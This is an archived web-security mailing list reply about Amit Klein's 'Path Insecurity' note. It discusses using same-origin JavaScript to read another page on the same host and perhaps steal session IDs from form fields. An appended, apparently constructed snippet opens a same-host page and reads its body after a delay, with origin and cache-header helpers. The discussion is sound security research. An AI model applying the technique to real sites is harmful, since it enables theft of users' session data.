
Re: [WEB SECURITY] Technical Note by Amit Klein: "Path Insecurity"



On 5/2/06, Amit Klein (AKsecurity) <aksecurity@xxxxxxxxxx> wrote:
> On 2 May 2006 at 12:42, Brian Eaton wrote:
> > I've spent the past day or two looking at javascript error messages
> > without being able to get this to actually work.  Are you willing to
> > share a proof-of-concept?
> >
>
> <---snip---->
> Fire /foo/attack.html, it'll open /bar/page1.html, then after 3 seconds, it'll pop-up
> "hello world" (from the body of /bar/page1.html).
>
> Hope this helps.

It did help, actually. This will show the cached version of /bar/page1.html, assuming the headers associated with the page allow caching. If /bar/page1.html has headers prohibiting caching, then a new request for /bar/page1.html is made.

I'm interested in techniques that let you get at the previously viewed
page, because of the ongoing discussion about session IDs in form
fields.  Making a new request for the page is sufficient sometimes,
but if you want to steal a dynamic form field it is not enough.

I know the browser has the previous version of /bar/page1.html around
even with "no-cache" headers, because I can view it with the forward
and back buttons in my browser.  But I can't figure out how to get to
it with javascript.  You mentioned traversing the history list in your
original note - do you still have that code around?

Regards,
Brian
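
An added illustration of the scenario Amit describes above (/foo/attack.html opening /bar/page1.html and reading its body after a delay). This is example code written for this archive page, not Amit's proof-of-concept and not Brian's code; the hostnames and the helper names are assumptions. It shows why a different path gives no isolation under the same-origin policy (only scheme, host and port are compared), and it encodes Brian's observation that a page sent with headers prohibiting caching is fetched again rather than served from the browser's copy:

```javascript
// Added example, not from the original thread. Reconstructs the
// /foo/attack.html -> /bar/page1.html scenario and two checks around it.
// Hostnames and function names are illustrative assumptions.

// The same-origin policy compares scheme, host and port only; the path is
// ignored. So /foo/attack.html and /bar/page1.html on one host share an
// origin, and the first may read the second's DOM.
function sameOrigin(urlA, urlB) {
  const a = new URL(urlA);
  const b = new URL(urlB);
  return a.protocol === b.protocol && a.hostname === b.hostname && a.port === b.port;
}

// Brian's point: a window.open() of a page whose response forbids caching
// does not show the previously viewed copy; the browser issues a new request.
// no-store forbids storing; no-cache and max-age=0 force revalidation, which
// still means a round trip to the server (constructed directive list).
function canServeFromCacheWithoutRequest(cacheControlHeader) {
  const directives = (cacheControlHeader || '')
    .toLowerCase()
    .split(',')
    .map(d => d.trim());
  return !directives.some(d => d === 'no-store' || d === 'no-cache' || d === 'max-age=0');
}

// Browser-only part: what /foo/attack.html does. The opened window is the
// same origin, so reading its body is permitted regardless of the path.
function runAttack(targetPath, delayMs, onBody) {
  const w = window.open(targetPath);          // same host, different path
  setTimeout(() => {
    onBody(w.document.body.innerText);        // allowed: origin matches
  }, delayMs);
}

// Only run the DOM part when loaded in a browser.
if (typeof window !== 'undefined' && typeof document !== 'undefined') {
  runAttack('/bar/page1.html', 3000, text => alert(text));
}
```

The two helpers make the thread's two observations checkable offline: the origin comparison returns true for any two paths on the same scheme, host and port, and the cache check returns false for no-store, no-cache and max-age=0, the cases where a fresh request, not the previously viewed copy, is what the attacker page gets.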

---------------------------------------------------------------------
The Web Security Mailing List
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives
http://www.webappsec.org/lists/websecurity/archive/
